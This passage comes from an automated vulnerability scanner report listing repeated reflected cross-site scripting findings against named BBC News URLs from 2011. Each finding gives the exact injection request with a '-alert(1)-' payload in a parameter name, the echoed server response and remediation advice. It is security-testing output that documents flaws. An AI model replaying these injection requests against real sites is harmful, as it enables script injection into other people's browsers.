Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/news/12437486?e5432'-alert(1)-'c0f235c4feb=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:43 GMT
Keep-Alive: timeout=10, max=652
Expires: Sat, 12 Feb 2011 02:02:43 GMT
Connection: close
Set-Cookie: BBC-UID=a48d2535de9a14f3597406b2f1c8a07f8d452cd230d0118fc249105ca6c067f60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a48d2535de9a14f3597406b2f1c8a07f8d452cd230d0118fc249105ca6c067f60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476163000,
       editionToServe: 'us',
       queryString: 'e5432'-alert(1)-'c0f235c4feb=1',
       referrer: null,
       section: 'also-in-the-news',
       sectionPath: '/Also in the News',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437486',
       assetTy
...[SNIP]...

1.3. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12427680 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12427680

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a3f5'-alert(1)-'3c65ddbac2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/news/business-12427680?5a3f5'-alert(1)-'3c65ddbac2f=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:43 GMT
Keep-Alive: timeout=10, max=775
Expires: Sat, 12 Feb 2011 02:02:43 GMT
Connection: close
Set-Cookie: BBC-UID=545dc5553e5a14c3cabc8616e140845d58be0f12b0d0916a04eb0a94c43c0f780Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=545dc5553e5a14c3cabc8616e140845d58be0f12b0d0916a04eb0a94c43c0f780Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476163000,
       editionToServe: 'us',
       queryString: '5a3f5'-alert(1)-'3c65ddbac2f=1',
       referrer: null,
       section: 'technology',
       sectionPath: '/Technology',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427680',
       assetType: 'story',
...[SNIP]...

1.4. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12428689 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12428689

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6de3f'-alert(1)-'3031a882b87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/news/business-12428689?6de3f'-alert(1)-'3031a882b87=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:43 GMT
Keep-Alive: timeout=10, max=768
Expires: Sat, 12 Feb 2011 02:02:43 GMT
Connection: close
Set-Cookie: BBC-UID=d49d85055e1a44839a82643d614ffde610b9d039d0d07179dbbb330e880d831a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=d49d85055e1a44839a82643d614ffde610b9d039d0d07179dbbb330e880d831a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476163000,
       editionToServe: 'us',
       queryString: '6de3f'-alert(1)-'3031a882b87=1',
       referrer: null,
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428689',
       assetType: 'story',
       
...[SNIP]...

1.5. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12431066 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12431066

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df7cf'-alert(1)-'9e8429e408c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/news/business-12431066?df7cf'-alert(1)-'9e8429e408c=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:43 GMT
Keep-Alive: timeout=10, max=786
Expires: Sat, 12 Feb 2011 02:02:43 GMT
Connection: close
Set-Cookie: BBC-UID=c48d9505befa34c3ba22bf115117809f99b0ffd7f02001491b4b939fc14577ea0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=c48d9505befa34c3ba22bf115117809f99b0ffd7f02001491b4b939fc14577ea0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 60841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476163000,
       editionToServe: 'us',
       queryString: 'df7cf'-alert(1)-'9e8429e408c=1',
       referrer: null,
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12431066',
       assetType: 'story',
       
...[SNIP]...

1.6. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12431281 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12431281

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a1a3'-alert(1)-'5e7fdcb884 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/news/business-12431281?3a1a3'-alert(1)-'5e7fdcb884=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:44 GMT
Keep-Alive: timeout=10, max=790
Expires: Sat, 12 Feb 2011 02:02:44 GMT
Connection: close
Set-Cookie: BBC-UID=549df585eeca44745a377ed0f18a9dcc8c77d14d00003149eb0bc25c5d95dfec0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=549df585eeca44745a377ed0f18a9dcc8c77d14d00003149eb0bc25c5d95dfec0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Content-Length: 64623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476164000,
       editionToServe: 'us',
       queryString: '3a1a3'-alert(1)-'5e7fdcb884=1',
       referrer: null,
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12431281',
       assetType: 'story',
       
...[SNIP]...

1.7. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12434447 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12434447

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9dcb'-alert(1)-'ed534fa143e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/news/business-12434447?d9dcb'-alert(1)-'ed534fa143e=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:44 GMT
Keep-Alive: timeout=10, max=759
Expires: Sat, 12 Feb 2011 02:02:44 GMT
Connection: close
Set-Cookie: BBC-UID=742dd5c58e1ae4642a321f34517d4a5bea02dc25c08001995b1b032fe17517ca0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=742dd5c58e1ae4642a321f34517d4a5bea02dc25c08001995b1b032fe17517ca0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476164000,
       editionToServe: 'us',
       queryString: 'd9dcb'-alert(1)-'ed534fa143e=1',
       referrer: null,
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12434447',
       assetType: 'story',
       
...[SNIP]...

1.8. http://www.bbc.co.uk/news/business-12434447 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12434447

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c243e'-alert(1)-'bbc1bb05d9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12434447?c243e'-alert(1)-'bbc1bb05d9e=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:53 GMT
Keep-Alive: timeout=10, max=797
Expires: Sat, 12 Feb 2011 02:02:53 GMT
Connection: close
Set-Cookie: BBC-UID=246da5255e3aa45d6b18a5f121fa7644652db01e404021e90b0ba3bfeba472be0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:53 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=246da5255e3aa45d6b18a5f121fa7644652db01e404021e90b0ba3bfeba472be0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:53 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476173000,
       editionToServe: 'us',
       queryString: 'c243e'-alert(1)-'bbc1bb05d9e=1',
       referrer: null,
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12434447',
       assetType: 'story',
       
...[SNIP]...

1.9. http://www.bbc.co.uk/news/business-12434453 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12434453

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 785fa'-alert(1)-'4f285e0559e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12434453?785fa'-alert(1)-'4f285e0559e=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:53 GMT
Keep-Alive: timeout=10, max=784
Expires: Sat, 12 Feb 2011 02:02:53 GMT
Connection: close
Set-Cookie: BBC-UID=647d95157e0a245d09d559bdf1fb3189fa4be84e3010e1bff25920ebd70d31ec0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:53 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=647d95157e0a245d09d559bdf1fb3189fa4be84e3010e1bff25920ebd70d31ec0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:53 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476173000,
       editionToServe: 'us',
       queryString: '785fa'-alert(1)-'4f285e0559e=1',
       referrer: null,
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12434453',
       assetType: 'story',
       
...[SNIP]...

1.10. http://www.bbc.co.uk/news/business-12435838 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12435838

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3faa'-alert(1)-'98d2e1d2cf4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12435838?d3faa'-alert(1)-'98d2e1d2cf4=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:54 GMT
Keep-Alive: timeout=10, max=759
Expires: Sat, 12 Feb 2011 02:02:54 GMT
Connection: close
Set-Cookie: BBC-UID=740dd5b5feaaf45ec84d25e30169e1b396f2602a40d0a2d3070d5a004583ca0e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:54 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=740dd5b5feaaf45ec84d25e30169e1b396f2602a40d0a2d3070d5a004583ca0e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:54 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476174000,
       editionToServe: 'us',
       queryString: 'd3faa'-alert(1)-'98d2e1d2cf4=1',
       referrer: null,
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12435838',
       assetType: 'story',
       
...[SNIP]...

1.11. http://www.bbc.co.uk/news/business-12437194 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12437194

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23b62'-alert(1)-'43e4c4839e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12437194?23b62'-alert(1)-'43e4c4839e5=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:55 GMT
Keep-Alive: timeout=10, max=794
Expires: Sat, 12 Feb 2011 02:02:55 GMT
Connection: close
Set-Cookie: BBC-UID=542de5c50eea648f1a11325cf1ceb5b361e921cb307081696bfbb382d72d590e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:55 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=542de5c50eea648f1a11325cf1ceb5b361e921cb307081696bfbb382d72d590e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:55 GMT; path=/; domain=bbc.co.uk;
Content-Length: 64202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476175000,
       editionToServe: 'us',
       queryString: '23b62'-alert(1)-'43e4c4839e5=1',
       referrer: null,
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437194',
       assetType: 'story',
       
...[SNIP]...

1.12. http://www.bbc.co.uk/news/education-12429152 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/education-12429152

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a110'-alert(1)-'20c3a9d2c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/education-12429152?8a110'-alert(1)-'20c3a9d2c2=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:56 GMT
Keep-Alive: timeout=10, max=789
Expires: Sat, 12 Feb 2011 02:02:56 GMT
Connection: close
Set-Cookie: BBC-UID=244d6515ee2a2530daa384e071544e25a50ee6f50040f1e97bab33df91d5c7aa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:56 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=244d6515ee2a2530daa384e071544e25a50ee6f50040f1e97bab33df91d5c7aa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:56 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476176000,
       editionToServe: 'us',
       queryString: '8a110'-alert(1)-'20c3a9d2c2=1',
       referrer: null,
       section: 'education',
       sectionPath: '/Education',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12429152',
       assetType: 'story',

...[SNIP]...

1.13. http://www.bbc.co.uk/news/entertainment-arts-12426999 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12426999

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f07bd'-alert(1)-'b372a7edb81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/entertainment-arts-12426999?f07bd'-alert(1)-'b372a7edb81=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:56 GMT
Keep-Alive: timeout=10, max=787
Expires: Sat, 12 Feb 2011 02:02:56 GMT
Connection: close
Set-Cookie: BBC-UID=f41db5d5eeaa35605a26917f61d793ffd0ef98fb4030f1e95b8b12ea967c84460Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:56 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=f41db5d5eeaa35605a26917f61d793ffd0ef98fb4030f1e95b8b12ea967c84460Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:56 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476176000,
       editionToServe: 'us',
       queryString: 'f07bd'-alert(1)-'b372a7edb81=1',
       referrer: null,
       section: 'entertainment-and-arts',
       sectionPath: '/Entertainment and Arts',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12426999'
...[SNIP]...

1.14. http://www.bbc.co.uk/news/entertainment-arts-12427905 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12427905

